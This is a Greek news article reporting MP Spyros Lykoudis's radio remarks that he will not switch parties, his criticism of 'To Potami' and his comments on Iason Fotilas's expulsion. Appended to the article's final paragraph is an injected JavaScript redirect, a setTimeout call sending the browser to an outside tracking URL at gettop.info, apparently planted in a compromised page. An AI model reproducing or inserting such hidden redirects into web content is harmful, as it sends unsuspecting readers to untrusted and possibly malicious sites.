Λυκούδης: Δεν έχω καμία πρόθεση να μετακινηθώ σε άλλο κόμμα

0
4

 

Απέκλεισε το ενδεχόμενο μετακίνησής του σε άλλο κόμμα ο Σπύρος Λυκούδης, βουλευτής με «Το Ποτάμι», μιλώντας στον ραδιοσταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 FM.

«Δεν έχω καμία απολύτως πρόθεση να μετακινηθώ σε κάποιο άλλο κόμμα και να πάω αλλού […] Εγώ θα παλέψω για τη συγκρότηση του μεσαίου χώρου, της μεγάλης δημοκρατικής παράταξης» τόνισε ο κ. Λυκούδης και πρόσθεσε: «Είμαι ένας άνθρωπος της Αριστεράς και όταν στοχεύω σε κάτι, εμμένω σ’ αυτό. Αν δεν το πετύχω, το πιθανότερο είναι ότι θα μείνω με τα άγχη μου ή με τις αγάπες μου τις πολιτικές, την Αριστερά, που αγάπησα. Δεν είναι ανάγκη να πάω κάπου. Υπάρχει και το σπίτι μου».

Σε ό,τι αφορά «Το Ποτάμι» και τα σχέδια για συγκρότηση μιας μεγάλης παράταξης της Κεντροαριστεράς, ο κ. Λυκούδης σχολίασε: «Το Ποτάμι είχε όλες τις προϋποθέσεις για να παίξει πρωταγωνιστικό ρόλο στη συγκρότηση του μεγάλου, δημοκρατικού, μεσαίου, μεταρρυθμιστικού χώρου. Πιστεύω ότι με μια σειρά λάθη δεν το έκανε, οπισθοχώρησε και τώρα βλέπω τις μεγάλες δυσκολίες που περνάει. Εύχομαι να ανακάμψει και να τις ξεπεράσει, αλλά […] νομίζω ότι θα δυσκολευτεί πάρα πολύ».

Αναφερόμενος στη διαγραφή του Ιάσωνα Φωτήλα από το κόμμα και τη δική του στάση, ο κ. Λυκούδης διευκρίνισε πως δεν υπερασπίστηκε τον κ. Φωτήλα ούτε το σύστημα των απόψεων που εκφράζει, με το οποίο δεν είναι σύμφωνος και διευκρίνισε: «Υπερασπίστηκα την ευθύτητα, τη συνέπεια και την καθαρότητα, με την οποία, από την πρώτη μέρα που εκλέχθηκε ο κ. Μητσοτάκης αρχηγός της ΝΔ, ο κ. Φωτήλας είπε ότι το Ποτάμι πρέπει να συνδράμει την προσπάθειά του αρχηγού της ΝΔ». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here